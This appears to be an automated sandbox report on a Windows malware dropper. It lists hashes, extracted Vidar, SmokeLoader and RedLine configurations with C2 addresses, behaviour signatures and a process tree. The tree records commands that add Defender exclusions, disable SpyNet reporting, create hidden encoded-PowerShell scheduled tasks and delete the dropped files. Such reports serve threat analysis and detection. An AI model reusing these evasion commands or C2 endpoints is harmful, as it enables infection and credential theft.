Analysis

  • max time kernel
    108s
  • max time network
    169s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220310-en
  • submitted
    15-03-2022 14:22

General

  • Target

    f92c41e49e5e9726f48e0577a82640935870c07c5551f0aa7a833d79180a3a12.exe

  • Size

    3.9MB

  • MD5

    85a1a5ff3b3bd02ba45c5d11ad7338fe

  • SHA1

    f27bf668ec434eec52454913e50e7ecb43821880

  • SHA256

    f92c41e49e5e9726f48e0577a82640935870c07c5551f0aa7a833d79180a3a12

  • SHA512

    132a47426b034ec4446152d43d4e01d4e5c426d447782b36caee7b3a8176990737b51ae22fc947853bca26b2609547ed58f8f21c9a46ae8f4015d10dceaddaaa

Malware Config

Extracted

Family

vidar

Version

39.4

Botnet

933

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

da da

C2

86.107.197.196:63065

Attributes
  • auth_value

    9b1654b30797c210c85bd0890936a5b9

Extracted

Family

vidar

Version

50.9

Botnet

1177

C2

https://ieji.de/@sam7al

https://busshi.moe/@sam0al

Attributes
  • profile_id

    1177

Extracted

Family

redline

Botnet

ruz876

C2

185.215.113.7:5186

Attributes
  • auth_value

    4750f6742a496bbe74a981d51e7680ad

Extracted

Family

redline

Botnet

filinnn1

C2

5.45.77.29:2495

Attributes
  • auth_value

    da347df57c88b125ede510dbe7fcc0f4

Extracted

Family

redline

Botnet

ruzki14_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    13b742acfe493b01c5301781c98d3fbe

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 10 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • UAC bypass 3 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 47 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 7 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 24 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f92c41e49e5e9726f48e0577a82640935870c07c5551f0aa7a833d79180a3a12.exe
    "C:\Users\Admin\AppData\Local\Temp\f92c41e49e5e9726f48e0577a82640935870c07c5551f0aa7a833d79180a3a12.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4828
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3784
      • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:5020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_1.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1628
          • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_1.exe
            sahiba_1.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:1892
            • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_1.exe
              "C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_1.exe" -a
              6⤵
              • Executes dropped EXE
              PID:3556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_3.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:620
          • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_3.exe
            sahiba_3.exe
            5⤵
            • Executes dropped EXE
            • Modifies system certificate store
            PID:2696
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 1032
              6⤵
              • Program crash
              PID:3504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_2.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:556
          • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_2.exe
            sahiba_2.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            PID:1744
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_5.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:444
          • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_5.exe
            sahiba_5.exe
            5⤵
            • Executes dropped EXE
            PID:3732
            • C:\Users\Admin\AppData\Local\Temp\is-QB7KB.tmp\sahiba_5.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-QB7KB.tmp\sahiba_5.tmp" /SL5="$C0090,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_5.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:3288
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_4.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:872
          • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_4.exe
            sahiba_4.exe
            5⤵
            • Executes dropped EXE
            PID:1760
            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              6⤵
              • Executes dropped EXE
              PID:3424
            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:1912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_10.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1352
          • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_10.exe
            sahiba_10.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:3844
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_9.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1612
          • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_9.exe
            sahiba_9.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:3756
            • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_9.exe
              C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_9.exe
              6⤵
                PID:2548
              • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_9.exe
                C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_9.exe
                6⤵
                • Executes dropped EXE
                PID:3088
              • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_9.exe
                C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_9.exe
                6⤵
                • Executes dropped EXE
                PID:5008
              • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_9.exe
                C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_9.exe
                6⤵
                • Executes dropped EXE
                PID:3472
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sahiba_8.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3828
            • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_8.exe
              sahiba_8.exe
              5⤵
              • Executes dropped EXE
              PID:3128
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sahiba_7.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1120
            • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_7.exe
              sahiba_7.exe
              5⤵
              • Executes dropped EXE
              • Checks computer location settings
              PID:3724
              • C:\Users\Admin\Documents\2waDZQ9qkAINOlucHvfWQdVc.exe
                "C:\Users\Admin\Documents\2waDZQ9qkAINOlucHvfWQdVc.exe"
                6⤵
                • Executes dropped EXE
                PID:1968
                • C:\Users\Admin\Documents\2waDZQ9qkAINOlucHvfWQdVc.exe
                  "C:\Users\Admin\Documents\2waDZQ9qkAINOlucHvfWQdVc.exe"
                  7⤵
                    PID:1676
                • C:\Users\Admin\Documents\w3uu_tXP0lENRWVzkxjVPRVU.exe
                  "C:\Users\Admin\Documents\w3uu_tXP0lENRWVzkxjVPRVU.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:692
                • C:\Users\Admin\Documents\kpTnpI6x6EYGA2APeppcnW5T.exe
                  "C:\Users\Admin\Documents\kpTnpI6x6EYGA2APeppcnW5T.exe"
                  6⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  PID:3036
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 452
                    7⤵
                    • Program crash
                    PID:2464
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 632
                    7⤵
                    • Program crash
                    PID:1300
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 660
                    7⤵
                    • Program crash
                    PID:2420
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 744
                    7⤵
                    • Program crash
                    PID:3000
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 1224
                    7⤵
                    • Program crash
                    PID:4292
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 1232
                    7⤵
                    • Program crash
                    PID:1292
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 1216
                    7⤵
                    • Program crash
                    PID:3936
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 1280
                    7⤵
                    • Program crash
                    PID:4588
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /im "kpTnpI6x6EYGA2APeppcnW5T.exe" /f & erase "C:\Users\Admin\Documents\kpTnpI6x6EYGA2APeppcnW5T.exe" & exit
                    7⤵
                      PID:1004
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /im "kpTnpI6x6EYGA2APeppcnW5T.exe" /f
                        8⤵
                        • Kills process with taskkill
                        PID:3720
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 1120
                      7⤵
                      • Executes dropped EXE
                      • Program crash
                      PID:2548
                  • C:\Users\Admin\Documents\xB17P_ncPDiqBlTAsex4JlC3.exe
                    "C:\Users\Admin\Documents\xB17P_ncPDiqBlTAsex4JlC3.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3336
                  • C:\Users\Admin\Documents\OXVD9h7TrbJ5bsvBu92xDbQM.exe
                    "C:\Users\Admin\Documents\OXVD9h7TrbJ5bsvBu92xDbQM.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:1352
                    • C:\Users\Admin\AppData\Local\Temp\7zS4C82.tmp\Install.exe
                      .\Install.exe
                      7⤵
                      • Executes dropped EXE
                      PID:2460
                      • C:\Users\Admin\AppData\Local\Temp\7zS6B93.tmp\Install.exe
                        .\Install.exe /S /site_id "525403"
                        8⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks computer location settings
                        • Drops file in System32 directory
                        • Enumerates system info in registry
                        PID:1452
                        • C:\Windows\SysWOW64\forfiles.exe
                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                          9⤵
                            PID:3500
                            • C:\Windows\SysWOW64\cmd.exe
                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                              10⤵
                                PID:4764
                                • \??\c:\windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                  11⤵
                                    PID:4112
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                    11⤵
                                      PID:4584
                                • C:\Windows\SysWOW64\forfiles.exe
                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                  9⤵
                                    PID:1484
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                      10⤵
                                        PID:2152
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                          11⤵
                                            PID:1320
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                            11⤵
                                              PID:320
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "gMthEUObP" /SC once /ST 08:14:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                          9⤵
                                          • Creates scheduled task(s)
                                          PID:1724
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /run /I /tn "gMthEUObP"
                                          9⤵
                                            PID:2384
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "gMthEUObP"
                                            9⤵
                                              PID:2248
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                10⤵
                                                  PID:1128
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 15:46:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\TXDWXMI.exe\" j6 /site_id 525403 /S" /V1 /F
                                                9⤵
                                                • Blocklisted process makes network request
                                                • Creates scheduled task(s)
                                                PID:3724
                                        • C:\Users\Admin\Documents\auoUfxYoVmqxa9uQcKd5ypAl.exe
                                          "C:\Users\Admin\Documents\auoUfxYoVmqxa9uQcKd5ypAl.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          • Loads dropped DLL
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Checks processor information in registry
                                          PID:3844
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im auoUfxYoVmqxa9uQcKd5ypAl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\auoUfxYoVmqxa9uQcKd5ypAl.exe" & del C:\ProgramData\*.dll & exit
                                            7⤵
                                              PID:2500
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im auoUfxYoVmqxa9uQcKd5ypAl.exe /f
                                                8⤵
                                                • Kills process with taskkill
                                                PID:3556
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 6
                                                8⤵
                                                • Delays execution with timeout.exe
                                                PID:4580
                                          • C:\Users\Admin\Documents\6_RZVyMPHgwk0lEyKPMWAMAh.exe
                                            "C:\Users\Admin\Documents\6_RZVyMPHgwk0lEyKPMWAMAh.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:2536
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\6_RZVyMPHgwk0lEyKPMWAMAh.exe
                                              7⤵
                                                PID:1128
                                                • C:\Windows\system32\choice.exe
                                                  choice /C Y /N /D Y /T 0
                                                  8⤵
                                                    PID:4992
                                              • C:\Users\Admin\Documents\envIb15B2O8gfFZCGZXw1_44.exe
                                                "C:\Users\Admin\Documents\envIb15B2O8gfFZCGZXw1_44.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                • Loads dropped DLL
                                                • Checks processor information in registry
                                                PID:1880
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im envIb15B2O8gfFZCGZXw1_44.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\envIb15B2O8gfFZCGZXw1_44.exe" & del C:\ProgramData\*.dll & exit
                                                  7⤵
                                                    PID:2396
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      8⤵
                                                        PID:4156
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im envIb15B2O8gfFZCGZXw1_44.exe /f
                                                        8⤵
                                                        • Kills process with taskkill
                                                        PID:3000
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 6
                                                        8⤵
                                                        • Delays execution with timeout.exe
                                                        PID:4268
                                                  • C:\Users\Admin\Documents\y1KuPIgGmh89uRzzkhIrt_AX.exe
                                                    "C:\Users\Admin\Documents\y1KuPIgGmh89uRzzkhIrt_AX.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1456
                                                  • C:\Users\Admin\Documents\Ru7CR094PaWBrp6qu_PHfq3d.exe
                                                    "C:\Users\Admin\Documents\Ru7CR094PaWBrp6qu_PHfq3d.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Checks BIOS information in registry
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of SetThreadContext
                                                    PID:3800
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                      7⤵
                                                        PID:2376
                                                    • C:\Users\Admin\Documents\F_ZFgZYib7zDpuFr4BPJ4BZL.exe
                                                      "C:\Users\Admin\Documents\F_ZFgZYib7zDpuFr4BPJ4BZL.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:3224
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 440
                                                        7⤵
                                                        • Program crash
                                                        PID:1800
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 480
                                                        7⤵
                                                        • Program crash
                                                        PID:4272
                                                    • C:\Users\Admin\Documents\KrWEUdPJRLWeNmfUJkDou2K6.exe
                                                      "C:\Users\Admin\Documents\KrWEUdPJRLWeNmfUJkDou2K6.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      PID:5044
                                                      • C:\Windows\SysWOW64\svchost.exe
                                                        "C:\Windows\System32\svchost.exe"
                                                        7⤵
                                                          PID:3556
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
                                                          7⤵
                                                            PID:2692
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd
                                                              8⤵
                                                                PID:4932
                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                  tasklist /FI "imagename eq BullGuardCore.exe"
                                                                  9⤵
                                                                  • Enumerates processes with tasklist
                                                                  PID:3492
                                                                • C:\Windows\SysWOW64\find.exe
                                                                  find /I /N "bullguardcore.exe"
                                                                  9⤵
                                                                    PID:3740
                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                    tasklist /FI "imagename eq PSUAService.exe"
                                                                    9⤵
                                                                    • Enumerates processes with tasklist
                                                                    PID:2164
                                                                  • C:\Windows\SysWOW64\find.exe
                                                                    find /I /N "psuaservice.exe"
                                                                    9⤵
                                                                      PID:1828
                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                      findstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla
                                                                      9⤵
                                                                        PID:4156
                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                        Sta.exe.pif V
                                                                        9⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:4804
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                          10⤵
                                                                            PID:3800
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                            10⤵
                                                                              PID:4440
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 448
                                                                                11⤵
                                                                                • Program crash
                                                                                PID:3832
                                                                    • C:\Users\Admin\Documents\0RuP0BblTEtv44BiOtHYafMh.exe
                                                                      "C:\Users\Admin\Documents\0RuP0BblTEtv44BiOtHYafMh.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Checks BIOS information in registry
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:3784
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                        7⤵
                                                                          PID:1964
                                                                      • C:\Users\Admin\Documents\Cvcil0oU_rXUzquVmt8oq_YE.exe
                                                                        "C:\Users\Admin\Documents\Cvcil0oU_rXUzquVmt8oq_YE.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:2500
                                                                      • C:\Users\Admin\Documents\PM9sxIyKGP3ZLIQac3mqZ1uI.exe
                                                                        "C:\Users\Admin\Documents\PM9sxIyKGP3ZLIQac3mqZ1uI.exe"
                                                                        6⤵
                                                                          PID:3432
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                            7⤵
                                                                              PID:4456
                                                                          • C:\Users\Admin\Documents\_GKVO71Pc67ar5UBWuhCNMks.exe
                                                                            "C:\Users\Admin\Documents\_GKVO71Pc67ar5UBWuhCNMks.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks processor information in registry
                                                                            PID:4164
                                                                          • C:\Users\Admin\Documents\OEVFnpz4FkRF18boyAsNY06q.exe
                                                                            "C:\Users\Admin\Documents\OEVFnpz4FkRF18boyAsNY06q.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Checks computer location settings
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4928
                                                                            • C:\Users\Admin\AppData\Local\Temp\b344bfae-0803-4921-a4ef-42cf0e3bcfa5.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\b344bfae-0803-4921-a4ef-42cf0e3bcfa5.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:3680
                                                                          • C:\Users\Admin\Documents\3kgAh8CzmmJSYseD5vX3fGDo.exe
                                                                            "C:\Users\Admin\Documents\3kgAh8CzmmJSYseD5vX3fGDo.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:2472
                                                                            • C:\Users\Admin\AppData\Local\Temp\e39974eb-71d4-4162-a67c-d8e571eb5e6b\1f1dc9b7-f6e2-44de-b5f9-7a01070ee0d5.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\e39974eb-71d4-4162-a67c-d8e571eb5e6b\1f1dc9b7-f6e2-44de-b5f9-7a01070ee0d5.exe" /o /c "Windows-Defender" /r
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4940
                                                                            • C:\Users\Admin\AppData\Local\Temp\e39974eb-71d4-4162-a67c-d8e571eb5e6b\AdvancedRun.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\e39974eb-71d4-4162-a67c-d8e571eb5e6b\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e39974eb-71d4-4162-a67c-d8e571eb5e6b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Checks computer location settings
                                                                              PID:2312
                                                                              • C:\Users\Admin\AppData\Local\Temp\e39974eb-71d4-4162-a67c-d8e571eb5e6b\AdvancedRun.exe
